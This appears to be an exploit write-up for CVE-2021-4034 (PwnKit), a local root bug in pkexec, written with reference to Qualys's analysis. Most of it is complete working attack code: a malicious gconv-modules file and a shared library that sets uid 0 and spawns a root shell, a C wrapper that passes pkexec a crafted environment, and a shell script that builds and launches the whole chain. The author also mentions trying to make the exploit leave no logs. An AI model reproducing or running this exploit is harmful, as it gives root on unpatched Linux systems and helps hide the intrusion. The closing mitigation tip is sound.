CVE-2021-4034 exploit and analysis

current 0day exploit for cve-2021-4034
written with reference to Qualys’s blog post
https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

Environment Setup

OS: Ubuntu 20.04 VM
Target: pkexec 0.105

Introduction

On the highest level possible, pkexec allows users to run programs as other users, similar to sudo.
It is setuid root by default, hence successful exploitation should allow for LPE.

The original Qualys blogpost did an excellent job explaining the bug, so I’ll just go through the steps I took to write the exploit from their analysis.

Exploitation

Doing a little research about GCONV_PATH tells us that it should point to a directory that contains a gconv-modules file.

Since Qualys told us that g_printerr() will attempt to convert from UTF-8 to other charset,
We can write our own gconv-modules file like this:

module  UTF-8//    INTERNAL    ../../../../../../../../tmp/shell    2
module  INTERNAL    UTF-8//    ../../../../../../../../tmp/shell    2

Such that whenever a conversion regarding UTF-8 occurs, it will use our malicious shared library /tmp/shell.so

/tmp/shell.so

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// gcc -shared -o shell.so -fPIC shell.c

void gconv(void) {}

void gconv_init(void)
{
    	putenv("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
	setuid(0);
	setgid(0);
	seteuid(0);
	setegid(0);
	system("/bin/sh");
}

Remember we messed the PATH variable up while exploiting, so we should to set it to something usable before spawning the shell.

Next we’ll set up the directory layout in a way that GCONV_PATH will eventually point to ./getpwned.

mkdir "/tmp/GCONV_PATH=."
mkdir "/tmp/getpwned"
touch "/tmp/GCONV_PATH=./getpwned"
chmod +x "/tmp/GCONV_PATH=./getpwned"

cat << EOF > /tmp/getpwned/gconv-modules
module  UTF-8//    INTERNAL    ../../../../../../../../tmp/shell    2
module  INTERNAL    UTF-8//    ../../../../../../../../tmp/shell    2
EOF

It is important to set the dummy file as executable, otherwise g_find_program_in_path() will fail.

After that, we can just write a wrapper program to invoke pkexec.

cve_2021_4034.sh:

#!/bin/sh

echo "[+] starting exploit"
echo "[+] creating layout"

mkdir "/tmp/GCONV_PATH=."
mkdir "/tmp/getpwned"
touch "/tmp/GCONV_PATH=./getpwned"
chmod +x "/tmp/GCONV_PATH=./getpwned"

cat << EOF > /tmp/getpwned/gconv-modules
module  UTF-8//    INTERNAL    ../../../../../../../../tmp/shell    2
module  INTERNAL    UTF-8//    ../../../../../../../../tmp/shell    2
EOF

cat << EOF > /tmp/hax.c
#include <stdio.h>
#include <unistd.h>

int main(void)
{
	char * exec_argv[] = {NULL};
	char * exec_envp[] =
	{
		"getpwned",
		"PATH=GCONV_PATH=.", // write rogue env variable
		"CHARSET=UTF-16", // force usage of iconv_open
		"SHELL=yeahdoesntexist", // trigger g_printerr()
		NULL
	};
	execve("/usr/bin/pkexec", exec_argv, exec_envp);
	return 0;
}
EOF

cat << EOF > /tmp/shell.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// gcc -shared -o shell.so -fPIC shell.c

void gconv(void) {}

void gconv_init(void)
{
    	putenv("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
	setuid(0);
	setgid(0);
	seteuid(0);
	setegid(0);
	system("/bin/sh");
}
EOF

echo "[+] compiling exploit and malicious library"

gcc -o /tmp/hax /tmp/hax.c
gcc -shared -o /tmp/shell.so -fPIC /tmp/shell.c

echo "[+] getting shell if vulnerable :)"

cd /tmp && /tmp/hax

Conclusion

Apparently this bug was undiscovered since pkexec was launched into production… scary to think about.
It’s a really powerful and reliable bug, great job to Qualys for discovering it.

The original blogpost also mentioned something about writing the exploit such that no logs are produced.
I’m not sure how to achieve that yet. Played around with forcing the access() call to fail by racing with a symlink, but doesn’t seem to be that reliable.

In the mean time I’ll remove the setuid bit from pkexec, and you should too!